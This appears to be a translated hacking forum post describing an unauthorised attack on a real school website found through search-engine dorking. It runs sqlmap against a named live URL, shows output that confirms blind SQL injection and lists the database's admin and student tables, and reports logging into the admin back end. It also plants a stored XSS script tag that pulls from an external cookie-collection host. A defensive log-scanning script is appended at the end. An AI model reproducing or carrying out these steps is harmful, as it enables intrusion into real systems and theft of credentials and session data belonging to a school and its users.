A school management system vulnerability package (including stored XSS and SQL injection vulnerabilities)

Source: Internet
Author: User
Tags: microsoft iis


"School website system"

This is the search keyword. You can add to it, or not! Found through Baidu.

 



Okay, let's do this first: does a GET injection exist?

[root@Hacker~]# Sqlmap sqlmap -u "http://www.tajx.com/TeacherView.asp?id=12"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:18:40

[20:18:40] [INFO] testing connection to the target url
[20:18:41] [INFO] testing if the url is stable, wait a few seconds
[20:18:43] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[20:18:46] [INFO] testing if GET parameter 'id' is dynamic
[20:18:46] [INFO] confirming that GET parameter 'id' is dynamic
[20:18:47] [WARNING] GET parameter 'id' appears to be not dynamic
[20:18:47] [INFO] heuristics detected web page charset 'GB2312'
[20:18:47] [WARNING] reflective value(s) found and filtering out
[20:18:47] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
[20:18:47] [INFO] testing for SQL injection on GET parameter 'id'
[20:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:18:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[20:18:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:18:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[20:19:22] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:19:33] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12 AND 5910=5910
---
[20:20:11] [INFO] testing Microsoft Access
[20:20:12] [INFO] confirming Microsoft Access
[20:20:13] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[20:20:13] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 30 times
[20:20:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[20:20:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'

[*] shutting down at 20:20:13


 

Use a D to view the account and password, then enter the admin back end... Prepare for further research! Then I saw one at the front end.

Write XSS code:

<script src="http://xss.esotsec.org/?u=57a23e" > </script>

Click to view

Although the page is blank, the XSS testing platform has received the information.

 

 

[21:44:14] [INFO] tried 3133/3144 items (100%)
[21:44:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
Database: Microsoft_Access_masterdb
[6 tables]
+----------+
| admin    |
| feedback |
| menu     |
| news     |
| school   |
| student  |
+----------+
[21:44:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 3142 times
[21:44:46] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tajx.com'

[*] shutting down at 21:44:46

 

Solution:

Prepare for further research! It is best to refine or obtain a certificate if you give me more rank .. Haha
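A defender-side check for the activity recorded in the two sqlmap runs above, as an added example that is not part of the original post: it scans IIS W3C log lines for a non-numeric value in a parameter that should be an integer (such as the `id=12 AND 5910=5910` payload) and for clients that accumulate HTTP 500 responses (30 and 3142 in the runs above). The log lines, client addresses, threshold and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended log format (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 20:18:41 GET /TeacherView.asp id=12 198.51.100.7 200
2024-01-01 20:18:47 GET /TeacherView.asp id=12%20AND%205910=5910 192.0.2.10 200
2024-01-01 20:18:48 GET /TeacherView.asp id=12%20AND%205910=5911 192.0.2.10 500
2024-01-01 20:18:49 GET /TeacherView.asp id=12%20AND%207421=7421 192.0.2.10 500
2024-01-01 20:18:50 GET /TeacherView.asp id=12%20AND%207421=7422 192.0.2.10 500
2024-01-01 20:19:02 GET /NewsView.asp id=7 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_injection_probes(text, numeric_params=("id",), max_500=2):
    """Return (tampered, noisy): non-integer values seen in parameters that
    must be integers, and clients with more than max_500 HTTP 500 responses."""
    tampered = []
    errors = Counter()
    for row in parse_w3c(text):
        query = row.get("cs-uri-query", "-")
        params = parse_qs(query, keep_blank_values=True) if query != "-" else {}
        # Classic ASP treats parameter names case-insensitively.
        params = {k.lower(): v for k, v in params.items()}
        for name in numeric_params:
            for value in params.get(name, []):
                if not re.fullmatch(r"\d{1,9}", value):
                    tampered.append((row["c-ip"], row["cs-uri-stem"], value))
        if row.get("sc-status") == "500":
            errors[row["c-ip"]] += 1
    noisy = {ip: n for ip, n in errors.items() if n > max_500}
    return tampered, noisy

if __name__ == "__main__":
    tampered, noisy = find_injection_probes(SAMPLE_LOG)
    for ip, uri, value in tampered:
        print(f"non-numeric id from {ip} on {uri}: {value!r}")
    print("clients over the HTTP 500 threshold:", noisy)
```

The same integer test belongs in the page handler itself: rejecting any `id` that is not a plain integer before it reaches the query closes the injection point that the log check only observes.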
